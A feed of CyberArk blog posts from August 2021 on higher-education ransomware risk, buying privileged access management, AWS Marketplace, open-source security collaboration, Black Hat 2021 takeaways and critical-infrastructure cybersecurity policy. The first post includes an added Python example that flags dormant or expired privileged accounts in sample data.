A Lesson on Higher Education Cybersecurity Risks  https://www.cyberark.com/blog/a-lesson-on-higher-education-cybersecurity-risks/ Tue, 31 Aug 2021 13:00:08 +0000 https://www.cyberark.com/?p=122716

U.S.-based education institutions continue to grapple with major challenges brought by the pandemic: the largest enrollment decline seen in a decade, swirling controversy over reopening physical classrooms, outmoded IT infrastructure that’s sagging under the pressure of digital teaching and learning, and near-crippling financial constraints. As the new school year begins, cyber attackers are expected to take advantage of the confusion and highly vulnerable state of the industry.

Ransomware is hitting the education sector particularly hard. Consider these recent statistics:

  • The Sophos State of Ransomware 2021 report found the education sector was the industry hardest hit by ransomware in 2020.
  • Last year, ransomware was responsible for 80% of malware-related incidents in the education services sector, according to the latest Verizon Data Breach Investigations Report.
  • A Check Point study found that the global education sector is the most targeted industry for malware and ransomware attacks in 2021 thus far. In July 2021 alone, researchers recorded an average of 1,739 attacks per organization per week.

Michigan State University was just one of the many institutions targeted recently, yet it’s one of the few that have come forward publicly about the attack that hit its department of physics and astronomy. The school did not pay the $6 million ransom demanded by the attackers but ran up more than $1 million in costs repairing and remediating its IT system. The university has been widely applauded for its transparency and is credited for educating the broader community about ransomware and other cybersecurity threats.

It’s Academic

In our latest CyberTalk with CyberArk podcast, Matt Kenslea, director, State, Local and Education (SLED), CyberArk, talks about higher education’s unique cybersecurity conundrum.

Universities’ “needs are different and unusual compared to commercial entities and government agencies,” he noted. Unlike other organizations, they have the autonomy to research and govern independently, but this also means that they shoulder the burden of securing massive troves of sensitive research data. The irony is that in many cases, these research and technology pioneers have limited means to implement effective cybersecurity for themselves, Kenslea said. “We need to focus and meet them where they are.”

“I saw a report recently where the FBI ranked higher ed as the number one target industry with ransomware, higher than financial services, which has historically been the market leader,” he noted. “This is a prize you don’t want to win.”

The FBI has also indicated that U.S. college campuses’ “open environments” make them especially vulnerable to cyber attackers using various methods to “steal information or products, bypass expensive research and development, recruit individuals for espionage, exploit the student visa program for improper purposes and spread false information for political or other purposes.”

Perimeter Evolves and Dissolves, Security Doesn’t Always Keep Up

Colleges are inherently collegial. They thrive on in-person contact in the office among administrators, faculty and students. When COVID-19 hit, colleges had to shift quickly to convert from an office-/classroom-driven operation to remote learning/remote work.

As a result, college IT departments “ran out and bought laptops for the first time. They installed anti-virus (AV) software and some form of multi-factor authentication (MFA),” Kenslea observed. But there was the sense that in the rush, they did not get security right or did not implement it as thoroughly as they would have had the process been more deliberate, thorough and comprehensive.

“Most colleges have not had a remote workforce before,” Kenslea said. “Increased reliance on cloud services and numerous personal networks and devices used beyond the physical campus definitely expand their perimeter and increase risk.”

This is very much on the front burner of concern among college IT leaders. In a Horizon Report® surveying the near future of college IT, information clearinghouse Educause found that fewer than half (47%) agreed their cybersecurity team is prepared to protect their evolving security perimeter.

This dissolving perimeter offers a target-rich environment for attackers. Start with the people working in higher ed: “Deans, the president, the CFO, the bursar, the provost… there are a lot of people with privileged access to a lot of sensitive data and systems,” Kenslea said. “What’s more, there are faculty who pursue and win grants and set up separate environments for their research completely outside of IT and security’s control.”

Such a roster is ideal for spear-phishing campaigns designed to steal or compromise an identity, or trigger a ransomware attack. Sometimes attackers will email students to reveal they’ve obtained their personal data, instructing them to contact administrators and urge them to pay the ransom, Kenslea explained. This puts the school in an impossible situation: pay and take a financial hit, or don’t pay and suffer reputation loss, which often leads to decreased enrollment and financial hardship.

Another point of vulnerability is the visiting professor. “They get provisioned with privileges to access sensitive resources on the network. Who knows how long they are going to be there?” Kenslea said. “Someone has to remember to de-provision them when they leave.” If the account is left dormant, it could become another avenue of attack.
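The dormant visiting-professor account is a detection problem as much as a process one: somebody has to notice that a privileged account has outlived its purpose. The following is an added example, not code from the original post or from CyberArk, that runs a simple review over a constructed export of accounts. It flags privileged accounts whose access end date has passed, that have never signed in since being provisioned, or that have been idle longer than a threshold. The record layout (`name`, `privileged`, `last_logon`, `access_expires`), the account names and the 30-day default are assumptions made for the example.

```python
"""Flag privileged accounts that look dormant or past their access end date.

Added example for the 'someone has to remember to de-provision them' point.
Input is a constructed list of account records; in practice the same records
would come from a directory or PAM export.
"""
from datetime import date

# Constructed sample export (not real data). last_logon None means the
# account has never signed in; access_expires None means open-ended access.
ACCOUNTS = [
    {"name": "vprof-smith", "privileged": True,
     "last_logon": date(2021, 3, 2), "access_expires": date(2021, 6, 30)},
    {"name": "vprof-lee", "privileged": True,
     "last_logon": None, "access_expires": date(2021, 12, 31)},
    {"name": "prof-garcia", "privileged": True,
     "last_logon": date(2021, 8, 27), "access_expires": None},
    {"name": "student-ng", "privileged": False,
     "last_logon": date(2021, 1, 10), "access_expires": None},
    {"name": "adm-ops", "privileged": True,
     "last_logon": date(2021, 7, 1), "access_expires": None},
]


def find_stale_privileged(accounts, today, max_idle_days=30):
    """Return [(account name, [reasons])] for privileged accounts that should
    be reviewed for de-provisioning. Standard (non-privileged) accounts are
    skipped so the list stays focused on the highest-risk identities."""
    findings = []
    for acct in accounts:
        if not acct["privileged"]:
            continue
        reasons = []

        # Access window has ended but the account still exists.
        expires = acct["access_expires"]
        if expires is not None and expires < today:
            reasons.append(f"access expired {(today - expires).days} days ago")

        # Never used, or idle beyond the threshold: both are de-provisioning
        # candidates, but 'never signed in' is its own case because there is
        # no logon date to subtract from.
        last = acct["last_logon"]
        if last is None:
            reasons.append("never signed in")
        elif (today - last).days > max_idle_days:
            reasons.append(f"idle for {(today - last).days} days")

        if reasons:
            findings.append((acct["name"], reasons))
    return findings


if __name__ == "__main__":
    # Review date fixed for reproducibility; use date.today() in practice.
    for name, reasons in find_stale_privileged(ACCOUNTS, date(2021, 8, 31)):
        print(f"{name}: {'; '.join(reasons)}")
```

Run against the constructed data with a review date of 31 August 2021, the departed visiting professor is flagged twice (expired access and months of inactivity), the newly provisioned one is flagged for never signing in, and a standing admin account surfaces as idle, while the active faculty account and the standard student account are left alone. Tightening or loosening `max_idle_days` is the usual knob: a shorter window catches accounts sooner at the cost of more review noise.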

The culture of openness that defines a college must be tempered with Zero Trust. “What we talk about is controlling, through least privilege, what a user can do on the machine, and how long they can do it without rechecking their access rights,” Kenslea said. The right approach must not break user workflows or generate tech support tickets; otherwise, users can’t accomplish anything because security is too onerous.

“There has to be a balance between security and usability,” Kenslea said. “You want systems that are adaptive, are protecting your endpoints, are managing your privilege, and are isolating users and sessions so that they can’t go out and cause problems.”

The Blueprint Drives the Playbook

So how can higher education institutions more effectively secure their campus IT systems? Kenslea offers some prescriptive steps in our podcast, based on the CyberArk Blueprint for Identity Security Success.

First, he noted, you must “assume breach” and shift your attention to stopping credential theft and subsequent movement throughout the environment.

Then, place emphasis on securing high-value targets, such as domain administrators and cloud administrators, via Privileged Access Management controls like password vaulting and rotation. “Session isolation and ephemeral access can also be used to narrow the scope of the breach, limiting the time an attacker has to move through the system, laterally and vertically,” he noted.

From there, lock down all the common platforms and systems, whether it’s Active Directory, server accounts or workstations, to “really get across the entire environment,” Kenslea said.

“Finally, make sure least privilege is enforced across all servers, workstations and users — paying special attention to removing local admin rights and implementing adaptive multi-factor authentication and layered endpoint protection,” he added.

“It’s a scary world out there. You don’t want to face it alone.”

Check out the entire CyberTalk with CyberArk episode to hear why now is the time for higher education to get with the (cybersecurity) program.

Ask These Questions Before Investing in Privileged Access Management https://www.cyberark.com/blog/ask-these-questions-before-investing-in-privileged-access-management/ Fri, 27 Aug 2021 13:00:37 +0000 https://www.cyberark.com/?p=122591 Ask These Questions Before Investing in Privileged Access Management

Identity and privileged access security challenges aren’t anything new — the pages of history are filled with tales of deception and fraud. During the Trojan War, the Greeks disguised their soldiers by putting them in a wooden horse to successfully infiltrate the city of Troy. In 16th century France, a penniless imposter claimed the identity, sizable property and wife of a man named Martin Guerre — and got away with it until the real Martin Guerre showed back up in town several years later. In the early 1900s, American fraudster Frederick Emerson Peters bamboozled banks all over the country with bad checks, impersonating celebrities, authors and even presidents. And the list goes on and on.

Fast-forward to present day, and identity and privileged access issues in the enterprise have only grown in complexity thanks to pervasive digital technology, cloud migration, new ways of working and continued attacker innovation. In both random and targeted strikes, identity compromise and manipulation of privileged access have become key elements of modern cyber attacks. According to the Identity Defined Security Alliance (IDSA) 94% of organizations have experienced an identity-related breach at some point. To eliminate security gaps, many cybersecurity teams are evolving their programs by taking a least privilege view of identity-related risk, with Privileged Access Management at the core of their Identity Security strategy.

Your security team recognizes the need for technology solutions that can be flexibly deployed to help secure identities and protect high-risk privileged access across on-premises, cloud and hybrid environments. But if your business is like most, it’s evolving so rapidly that it can be difficult to articulate your exact technology requirements during the evaluation and procurement process (let alone anticipate future needs).

This list of key questions and considerations can help guide IT security decision-makers by simplifying the process of evaluating and selecting the right technology vendor and tools to help you accomplish your identity and Privileged Access Management goals.

Six Questions to Ask Your Potential Identity and Privileged Access Management Provider  

1. Can it Support a Hybrid Infrastructure?

The right Privileged Access Management solution enables an evolving set of hybrid technologies that drive operational efficiencies across all identities, infrastructure and applications for hybrid, multi-cloud and SaaS workloads. To help ensure full coverage and compliance, ask if the solution can:

  • Seamlessly connect users (both human and machine) to resources across on-premises, hybrid, multi-cloud and SaaS workloads in an efficient and cost-effective manner
  • Help you conform with customer compliance and privacy expectations through tools and services that are recognized and trusted by regulators, auditors and authorizing officials
  • Integrate with your existing applications, along with new and evolving infrastructure to maximize your IT investments

2. Can it Support Diverse Transactions and Align to Digital Transformation Objectives?

Businesses are embracing DevOps to transform software development and robotic process automation (RPA) to extend the power of automation into new realms. By integrating with automation, scripts and workflow-oriented application program interfaces (APIs), your Privileged Access Management solution can help you take full advantage of digital transformation’s efficiency and productivity benefits — without jeopardizing cybersecurity. Ask if it can:

  • Consistently manage the many embedded credentials among DevSecOps, cloud and traditional applications
  • Enable secure vaulting and management of privileged account credentials used by software robots and RPA administrators
  • Support automated application lifecycle management to boost productivity and minimize IT delays
  • Enable just-in-time privileged access through shared accounts and a break-glass approach

3. Does it Prioritize the End-User Experience?

People are a critical part of securing the enterprise. Any process that adds complexity or burden to managing and protecting privileged access brings additional risk, reduces productivity and impedes effectiveness. To gauge the potential impact on users’ access experience, ask if the solution can:

  • Make it easy for users to “do the right thing” when it comes to security by balancing intuitive, frictionless access and strong Identity Security controls
  • Monitor and secure remote access to maximize effectiveness while enforcing least privilege requirements
  • Support self-service capabilities and automated workflows to help users stay efficient and productive
  • Be deployed through a cost-effective, flexible SaaS model to help minimize internal operational burden and cost

4. Can it Prepare You for Tomorrow’s Challenges Today?

Identity itself is evolving, as sensors and operational technology join microservices, software robots and virtual services. The most effective solution will help ensure continued alignment with both your security needs and digital business opportunities of tomorrow. Ask if the technology provider can:

  • Demonstrate business acumen for strategic acquisitions and a strong R&D pipeline to address emerging threats and use cases
  • Draw upon industry-leading threat researchers dedicated to examining emerging attack techniques to drive improvement for the security community

5. Can it Help Defend Against Advanced and Evolving Threats?

The U.S. National Security Agency recommends that organizations consciously operate and defend resources as if the adversary already has a presence within the environment. In this “assume breach” model, the right solution must treat every transaction as untrusted until verified. Ask if the provider and solution can:

  • Apply least privilege practices through dynamic security policies to secure all identities – human and machine – from end-to-end
  • Enable a Zero Trust approach that leverages adaptive authentication and authorization, supported by a tamper-proof audit trail of all activity
  • Provide measurable risk reduction and reduced costs through a successful and continually improving program framework

6. Can it Support a Broad Ecosystem?

Because identity is the thread that binds every facet of an enterprise’s information and technology infrastructure, the right solution should demonstrate the ability to interoperate with a broad array of applications, services and providers. To help minimize future technical debt and stranded technologies, ask if the provider can:

  • Demonstrate an alliance of third-party integrations to help preserve the value of your existing IT assets and services
  • Support integration through an extensible platform for everything from homegrown applications to external services
  • Easily integrate via trusted industry standards and protocols like SAML, REST and OAuth

Your data is one of your business’s most critical assets — yet it’s likely dispersed across a complicated web of in‑house, online and external systems. The right Privileged Access Management solution must be able to consistently protect that data against identity-based threats to confidentiality, integrity and availability.

When you consider the importance of securing privileged access to that critical data, the experience of the technology vendor matters — and should be evaluated with the same rigor as the tool itself. The right partner must be able to demonstrate a solid product approach, proven execution track record, flexible deployment models, customer service excellence, consistent recognition by leading analysts and industry experts and a stable corporate presence.

Refer to these questions during your vendor evaluation process and again as you build out your strategy for managing privileged access, monitoring transactions and mitigating threats. And for a deeper dive into evaluation considerations, download “The Buyer’s Guide to Securing Privileged Access.”

CyberArk on AWS Marketplace: Driving Faster Time-to-Value for Customers and Partners
https://www.cyberark.com/blog/cyberark-on-aws-marketplace-driving-faster-time-to-value-for-customers-and-partners/ (Tue, 24 Aug 2021 12:35:48 +0000)

Migrating workloads to the cloud is a top priority for many organizations, and businesses everywhere are using Amazon Web Services (AWS) to accelerate IT service agility, simplify operations and minimize capital equipment expense and complexity. In this cloud-delivered world, organizations are looking for SaaS-delivered security solutions — along with easier ways to consume them — to protect against identity-centric attacks across modern IT environments and support their increasingly hybrid workforces.

Since we couldn’t be together for AWS re:Inforce this summer, we’re revisiting a 2021 Impact Live conversation with Matt Girdharry, leader for DevOps, Observability & Security, AWS Marketplace, Amazon Web Services; Chris Moore, CyberArk VP of global channels; and Joanne Wu, CyberArk VP of business development. The trio explored how organizations can best leverage CyberArk, our partner ecosystem and AWS Marketplace to drive faster time-to-value and rapid risk reduction.

Modernizing the Digital Supply Chain

“A typical customer today has about 1,000 applications that they’re thinking about migrating over to AWS,” said Girdharry. “As they’re taking the core applications they’ve built — the lifeblood or IP of their organization — and figuring out how to re-architect them, they’re also thinking, ‘How do I take these on-prem third-party applications that have been running in my data centers and migrate them with me?’”

They have an opportunity to do just that through AWS Marketplace, unlocking the benefits of AWS for the security technologies and services they already know and trust. “Customers love the fact that they can modernize their core IP applications along with their supply chain through SaaS-based subscriptions,” Girdharry continued.

“AWS and CyberArk have been working together for several years across three major dimensions: Securing the cloud, running CyberArk Identity Security solutions in the cloud and, most recently, helping organizations around the world to procure through AWS Marketplace,” explained Wu.

The AWS Marketplace also enables CyberArk channel and C3 Alliance partner organizations to drive new customer value by simplifying business transactions. “As organizations adopt cloud computing and digitally transform their business, our partners need to deliver solutions in the way that their customers want to buy them,” said Moore. “By leveraging the AWS Marketplace, our partners are in the best position to deliver real and rapid value and continually meet evolving customer needs.”

CyberArk’s focus on AWS Marketplace facilitates CyberArk’s ongoing transition to deliver enhanced customer value and greater deployment flexibility and simplicity through a subscription-based model. As Moore specified, selling through AWS Marketplace “aligns incredibly well with our own shift to SaaS. From the channel and partner side, it’s all about eliminating friction.”

A Whole That’s Greater Than the Sum of its Parts

Perhaps the best way to illustrate the value that AWS Marketplace delivers to organizations is through the Amazon “flywheel” — a concept first popularized by author Jim Collins and embraced by Jeff Bezos to elevate the customer experience.

The flywheel’s hallmark characteristic is that no one thing powers it. Instead, it moves by many components acting in concert — equating to a whole that’s greater than the sum of its parts. AWS Marketplace gives customers an ever-wider selection of tools to improve performance across security and compliance functions. Simultaneously, vendors benefit from greater intelligence on how customers adopt features, allowing teams to accelerate their innovation and, in turn, make AWS Marketplace even more valuable for customers.

Breaking Down the Cloud Shared Security Responsibility Model

It’s important to remember that when it comes to security, everyone has a part to play. Under this shared responsibility model, the end user is responsible for certain Identity and Access Management (IAM) functions, including Privileged Access Management. Organizations can fulfill those responsibilities using CyberArk’s SaaS-based Identity Security solutions on AWS Marketplace.

“Security and compliance are a shared responsibility,” explained Girdharry. AWS is responsible for protecting the global infrastructure that runs all of the services offered in the AWS Cloud. For abstracted services, such as Amazon S3 and Amazon DynamoDB, AWS is also responsible for the security of the operating system and platform. Customers and APN Partners, acting either as data controllers or data processors, are responsible for anything they put in the cloud or connect to the cloud.

He continued, “Our philosophy at AWS Marketplace is that we’re not going to leave you hanging — we’re going to supply you with the best possible security tools, including solutions from CyberArk that actually help you perform that piece of your responsibility as a customer.”

This support extends to digital organizations’ expanding DevOps practices. As many companies move away from monolithic, virtual machine-based worlds and modernize to microservices, DevSecOps becomes extremely important. “CyberArk plays a huge role in that in terms of providing the right types of access, to the right pieces of that code production pipeline, all the way up into the production environment,” said Girdharry.

CyberArk’s cloud and DevOps experts are also actively involved in numerous AWS-led open source and code donation projects that enable developers and help organizations securely meet their objectives.

Visit CyberArk on AWS Marketplace

Embracing cloud, remote work and other digital transformation initiatives cannot be a tradeoff with security. With access to CyberArk Identity Security solutions on AWS Marketplace, organizations can move forward with confidence.

CyberArk offerings on AWS Marketplace include CyberArk Privileged Access Manager, CyberArk Endpoint Privilege Manager, CyberArk Cloud Entitlements Manager, CyberArk Privilege Cloud, CyberArk Workforce Identity, Conjur Secrets Manager Open Source and CyberArk Privileged Access Manager for GovCloud (US). To learn more, visit CyberArk on AWS Marketplace.

How Collaborative Cybersecurity Is Disrupting Disruption
https://www.cyberark.com/blog/how-collaborative-cybersecurity-is-disrupting-disruption/ (Fri, 20 Aug 2021 13:00:27 +0000)

Out of a period of severe, real-world disruption came disruption’s polar opposite: cooperation. For a long time, cybersecurity seemed to be an area that needed to be shrouded in mystery. Don’t let others know your weaknesses, and don’t erode trust in your services by revealing breaches. But this tendency only served to make efforts to increase security and thwart attackers muddier and more vulnerable.

When COVID-19 showed the world true and thorough disruption, everyone was shaken out of their comfort zone and, as the recent White House Executive Order made clear, the only path forward was consistent and transparent communication and teamwork within the cybersecurity community.

Effective cybersecurity collaboration — to build resilience and protect the people and organizations that rely on us — is possible. And taking a page from the open source community, which has been doing this for years, is a great place to start.

Open Source Collaboration: Offshoot of a New Normal?

Open source has transformed software development by bringing diverse minds, experiences and approaches together to tackle a wide range of challenges — and make solutions universally accessible. It’s grounded in the notion that no one can whistle a symphony; it takes a whole orchestra to play it. Disruptive open source innovations like Docker, Kubernetes, Ansible and Jenkins prove this is so.

According to a 2021 Red Hat study, 90% of IT leaders use enterprise open source today, citing IT infrastructure modernization (64%), application development (54%) and digital transformation (53%) as top use cases. And for these leaders, a team mentality matters, with 83% indicating they’re more likely to select a software vendor that contributes to open source projects.

Our CyberArk team has long been active in — and inspired by — the open source community. In 2019, we introduced CyberArk Commons, an open forum for developers, engineers and security professionals. We spoke with CyberArk DevOps security engineer Joe Garcia — one of the forum’s founding members — about how CyberArk Commons has evolved in the “new normal” and how this community-centric approach has shaped his own development philosophy.

“The need to share information more openly and more rapidly has increased at the rate of attacker innovation,” says Garcia. “Everything is so much faster. It doesn’t take eight hours to compile an application anymore. Attackers are watching secrets come through in real time and trying them out, so you don’t have 15 minutes to rotate that password after you onboard it. It better be done before it even hits the wire because they’re going to find it.”

CyberArk Commons became a place where developers across the industry — predominantly working remotely and independently as a result of the pandemic — could gather to talk shop, seek advice, float ideas, build secure applications even faster and, collaboratively, cut through disruption.

Structured like a traditional online forum, the Commons offers sections for general conversation, news and announcements and inquiries about specific DevSecOps tools like Conjur Secrets Manager Open Source, Conjur Secrets Manager Enterprise and Summon. Members can also dig into cutting-edge cybersecurity research and explore the many community contributions on the CyberArk Marketplace.

As Garcia explains it, CyberArk Commons is “… geared toward developers who recognize that securing their secrets is the first line of defense against DevOps pipeline attacks.” Because of COVID-19, many are working outside the protected ‘walls’ of their organizations’ networked environments for the first time — and they’re being targeted through spear-phishing, impersonation and other methods with increasing frequency.

Culture is a huge part of software engineering, and the abrupt shift to remote work has deprived developers of the ability to quickly brainstorm or bounce ideas. “Instead, they’re going to all these other websites and posting their source code up,” Garcia explains. “The last thing we want are hard-coded secrets leaking out in that code.”

DevOps Security Community Service

Garcia stumbled into the DevOps security field in unusual fashion. One of the largest financial organizations in his home state of Florida was hiring, and he decided to apply.

“The first question they asked me was ‘Have you ever used PowerShell?’” he recalls with a laugh (the answer was no). The second was, “What’s your weakest skill?” — to which he replied, “Numbers.” So naturally, he got the job and was tasked with using PowerShell to automate Identity and Access Management (IAM) processes and data analysis across the organization’s information security department.

In his words, he quickly “learned how I learn” — by drinking directly from the proverbial fire hose. And he’s never stopped learning. Now a prolific open source contributor with an A+ GitHub ranking and a dedicated technical following on YouTube, Garcia is quick to recount the many times the community has helped him overcome a challenge or enhance an existing project.

“Everything that I do comes from the community, one way or another,” Garcia says. He uses the example of cyber-cli, a “Swiss army knife” command-line interface (CLI) that marries APIs across the CyberArk Identity Security Platform to simplify human and non-human interaction. “We received feature and issues feedback from both CyberArk employees and community members — I’ve even gotten pull requests from the community on this. The contributions for these community-driven projects have been fantastic.”

When it comes down to it, a nimble and communicative community only enhances cybersecurity efforts — and the approach of “we can all learn from one another” fortifies defenses against an ever-shifting and ever-accelerating threat landscape. Eliminating the hoarding of proprietary information and the gatekeeping between developers leaves security teams better equipped to move at the speed of attack.

“There’s a lot of scary stuff out there happening so rapidly because of all of the cloud-native stuff. Attackers don’t need to manage infrastructure. They’ve got cloud services doing it for them,” says Garcia. “So, we’ve got to be just as quick as them.” To disrupt the disruption, as it were.

Unveiling the “Secret” to Securing Secrets in Automation Environments

As sophisticated cyber attackers target application code and DevOps pipeline tools, the need to shift security left is widely understood. But what are the best ways to do this within an automation environment to speed processes and beef up security?

Find out in Garcia’s presentation “Red Hat + CyberArk: A Reference Architecture for Securing Ansible Automation & CI/CD Pipelines” at AnsibleFest 2021, taking place virtually September 29-30.

Organizations around the world use Ansible and CyberArk’s integrated solution to streamline the rotation and management of secrets and privileged credentials, and automate the prevention and remediation of high-risk activities. In his session, Garcia and co-presenter Roland Wolters, principal technical marketing manager at Isovalent, will detail the Red Hat Ansible Automation Platform and CyberArk reference architecture, elaborate on best practices used by organizations for layering security into their automation platforms and share proven tips for avoiding potential pitfalls along the way.

Black Hat Reflections: Supply Chain Attacks, Zero Days and Disclosures
https://www.cyberark.com/blog/black-hat-reflections-supply-chain-attacks-zero-days-and-disclosures/ (Wed, 18 Aug 2021 13:00:56 +0000)

Black Hat 2021 had a markedly different tone from previous years. Welcoming remarks explored the strong parallels between cybersecurity and COVID-19 prevention, with founder Jeff Moss asking “…what are you doing to try to confer an immunity to those around you?” and urging the security community to be part of the solution.

Whether you ventured to Vegas or tuned in from afar, the thought-provoking questions and content continued throughout the event. Here are some topics that particularly stood out to me:

Ransomware Supply Chain Targets Aren’t Always the Real Targets

Throughout the event, supply chain attacks dominated the conversation. Opening keynote speaker Corellium COO Matt Tait painted a sobering picture of the near-future, warning that what we’ve seen is “peanuts” compared to what’s coming. Instead of using “spray and pray” tactics, attackers — and ransomware actors in particular — are targeting very specific organizations for very specific reasons. And they’re using upstream providers like Kaseya to reach them. Tait also noted that the number of zero days being exploited by attackers is “off the charts,” reaching levels not seen in the past eight years. Why? They’re scaling their attacks, pulling out all the stops and moving at incredible speed.

The Malware-as-a-Service Market Is Thriving

While attacks are growing in sophistication and scale, there are still plenty of threat actors going after “low-hanging fruit.” For instance, the dark world of malware-as-a-service (MaaS) is alive and well, providing nefarious characters with easy access to popular credential theft malware, one of the most prevalent types of malware used in cyber attacks today. The main objective of nearly all credential theft malware is to gather as much confidential and sensitive information (like user credentials and financial information) as possible. Popular credential stealers, such as Oski Stealer, are cheap to buy and can be operationalized easily — with little to no technical skills required.

Identity’s Leading Role in Major Breaches

The cybersecurity community needs to collaboratively innovate to move as fast as our adversaries — and embracing an attacker’s mindset is a crucial starting point. In my Black Hat talk, “The Anatomy of a Breach with CyberArk Labs: Supply Chain and Privilege,” we did just that by deconstructing the phases of recent supply chain attacks — from initial infection and customer targeting through privilege escalation and exfiltration. By examining revelations from these attacks, it’s clear that the compromise of identity and subsequent manipulation of privileged credentials were instrumental in their success. To build effective cybersecurity strategies, you have to assume that any identity in your network may be compromised. And instead of trying to keep the “bad guys” out, you can focus on protecting what they’re after.

The Disclosure Debate Reignites

Speaking of identity compromise, criminal enterprises are increasingly reliant on vulnerable web applications to harvest credentials and launch their attacks. Navigating the internet’s many hidden dangers is a challenge for consumers and security researchers alike. So, it was no surprise that tools that can search across websites for vulnerabilities and aggregate threat information on exploitable flaws at scale created buzz, and even some controversy, at Black Hat. The debate boiled down to this: Attackers are innovating in lockstep with defenders. Do well-intentioned vulnerability disclosure tools give them an edge?

Cloud Apps Now the “Holy Grail” for Espionage Attackers

As organizations shift more data to the cloud, nation-state attackers are setting their sights on popular SaaS applications as they work to exfiltrate sensitive information. With motivations that reach far beyond financial gain, these types of attacks often require stealthy, long-term persistent access in cloud environments. At the conference, researchers presented a series of novel and sophisticated attack techniques seen in the wild — one of the most notable being Golden SAML, first discovered by CyberArk Labs, and used in the massive SolarWinds supply chain attack.

Passwordless Authentication Risks We Now “Face”

Biometric authentication is gaining traction in the enterprise to help mitigate the numerous security risks inherent with password use. But, considering most of our faces are out in the public domain, passwordless login features are not fail-safe. Our own CyberArk Labs security researcher Omer Tsarfati presented his talk, “Bypassing Windows Hello for Business and Pleasure,” on how to circumvent Microsoft’s Windows Hello biometric authentication using a spoofed USB webcam, in what PC Mag called one of the “scariest things” seen at this year’s show. Read more about his research here.

Open Source Tools Aid Containerized Environment Testing

Managing containerized workloads and services is top of mind for many DevOps teams today, and according to a recent Cloud Native Computing Foundation (CNCF) survey, more than 78% of organizations rely on Kubernetes as their container orchestration platform. This year, multiple Black Hat sessions focused on finding and mitigating vulnerabilities in these dynamic environments — with community-sourced tools that aid pen testers and Red Teamers in pinpointing threats generating significant interest.

Biohacking Is the New Frontier

The threat research and tools presented at Black Hat are essential in helping security professionals protect against digital threats. But what happens when they come up against someone who is both the attacker and the attack vector? My CyberArk colleague Len Noe took Black Hat attendees deeper into the mind of an attacker: from a rogue employee sporting an implanted RFID microchip to secretly store sensitive data and files to the malicious outsider who conceals an entire Linux system beneath their skin to pass every physical and digital security check and make off with your most valuable corporate assets. While it sounds like a science fiction novel, it’s real life today. Are you ready?

Critical Infrastructure Cybersecurity Gets its Invisible Spotlight
https://www.cyberark.com/blog/critical-infrastructure-cybersecurity-gets-its-invisible-spotlight/ (Fri, 13 Aug 2021 13:00:54 +0000)

While the federal government cannot command private industry, it can provide direction and drive urgency. To this end, the Biden Administration recently issued a new National Security Memorandum (NSM) outlining steps to safeguard the country’s critical infrastructure. This follows a series of government actions, including the May 2021 Executive Cybersecurity Order and 2020 Certified Maturity Model Certification (CMMC) roll out, which may “sound bureaucratic, but that have teeth,” to quote Washington Post’s David Ignatius.

During a recent speech at the Office for the Director of National Intelligence, President Biden warned that ransomware and other cyber threats “increasingly are able to cause damage and disruption in the real world,” according to Financial Times. “If we end up in a war, a real shooting war with a major power, it’s going to be as a consequence of a cyber breach,” he continued.

The latest directive is purely voluntary and collaborative, as about 85% of U.S. IT infrastructure resides in the private sector, beyond Washington’s command. Still, the Industrial Control System Cybersecurity Initiative calls for the federal government to “create a path” for government and industry to take action “within their spheres of control to address serious threats.” The Department of Homeland Security will be issuing preliminary sector-specific cybersecurity goals by September 22, making them final one year later. A parallel legal study suggests the government may push to make these requirements legally binding in the future, reports CSO.

Historically, such proposed regulations have met resistance. Yet on the heels of major breaches from SolarWinds to Kaseya, the stakes have never been higher. At Black Hat USA, Scott Shackelford, cybersecurity program chair at Indiana University and Christopher Hart, former chairman of the National Transportation Safety Board (NTSB), called for a middle ground of sorts in the form of a national cybersecurity safety review board — an independent agency similar to the NTSB — that could investigate major cyber incidents to find out why they happened and even subpoena organizations, when necessary, to help prevent them from happening again.

Critical Infrastructure: A Broad Definition and Target-Rich Environment

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) identifies 16 critical sectors that need to improve cyber defenses: chemical, commercial facilities, communications, critical manufacturing, dams, defense industries, emergency services, energy, financial services, food and agriculture, government facilities, healthcare, IT, nuclear power, transportation and water/wastewater. This designation of “critical infrastructure” in the U.S. is much broader than in other parts of the world, such as the EU, which recognizes only seven sectors.

All these critical sectors rely on computerized operational technology (OT) to function, which is fast converging with IT and exposing critical industrial control system (ICS) endpoints and other assets to aggressive threats like ransomware.

Add to that remote access, the Internet of Things (IoT) and the cloud — and the attack surface increases significantly, allowing more opportunities for attackers to get into IT/OT systems. A successful attack on critical infrastructure could disable or destroy production lines and industrial processes, leave cities in the dark or shut off critical lifesaving technologies.

Corporate IT executives are aware of the hazards. A 2020 Ponemon Institute survey of more than 2,500 cybersecurity practitioners responsible for protecting OT systems found 57% believed they will face one or more attacks, while almost half believe that the risks are higher for OT systems than IT systems. Slightly more than six out of 10 believed that OT and IT security efforts are not aligned. Nearly half also said that the threat to OT systems is increasing. They identified the three biggest threats: phishing, ransomware and denial-of-service attacks. One-third admitted that their companies suffered the loss of OT-related intellectual property as a result of previous attacks.

The challenge is enormous. During his Black Hat talk (you can check out slides here), Shackelford asked, “Here in the states, given our broad perspective on critical infrastructure, if everything is critical, how can we best coordinate our expertise and resources to defend vulnerable critical infrastructure against the huge array of cyber-enabled threats, including ransomware, that we’ve seen recently?”

The Need for Night Vision

One thing is clear, as the Biden memo states: “We cannot address threats we cannot see; therefore, deploying systems and technologies that can monitor control systems to detect malicious activity and facilitate response actions to cyber threats is central to ensuring the safe operations of these critical systems.”

Most critical infrastructure companies operating with legacy security measures are in the “blind” position. They cannot defend against threats they cannot see and only know if they have been attacked after the damage is done. This could be weeks, months or even years after suffering an initial intrusion.

Of significant concern is the sharp rise of ransomware attacks targeting the critical infrastructure space. According to a report from The Institute for Critical Infrastructure Technology (ICIT), “if a SCADA or ICS system in an energy, utilities or manufacturing organization becomes infected with ransomware, then lives could be jeopardized in the time it takes to investigate the incident and return the systems to operation.”

A Zero Trust Playbook for Ransomware Protection

This May, CISA and the FBI issued guidance on protecting critical infrastructure from ransomware. Here is a look at three of their key recommendations for defense-in-depth ransomware protection:

  • Attacks on powerful ICS systems often begin with identity compromise at the endpoint and subsequent abuse of privileged credentials. The CISA and FBI provide the following guidance: “Ensure user and process accounts are limited through account use policies, user account control and privileged account management. Organize access rights based on the principles of least privilege and separation of duties.”
